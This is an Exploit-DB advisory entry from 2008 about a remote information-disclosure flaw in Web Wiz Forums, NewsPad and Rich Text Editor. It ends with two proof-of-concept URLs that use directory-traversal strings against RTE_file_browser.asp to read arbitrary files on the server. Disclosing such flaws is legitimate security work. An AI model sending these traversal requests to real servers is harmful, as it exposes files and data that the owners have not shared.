Web Wiz (Multiple Products) - Remote Information Disclosure

EDB-ID:

31055

CVE:

N/A




Platform:

ASP

Date:

2008-01-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/27419/info

Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input.

An attacker can exploit this issue to retrieve arbitrary files in the context of the webserver process. Information obtained may aid in further attacks; other attacks are also possible.

This issue affects Forums 9.07, NewsPad 1.02, and Rich Text Editor 4.0; other versions may also be vulnerable. 

http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\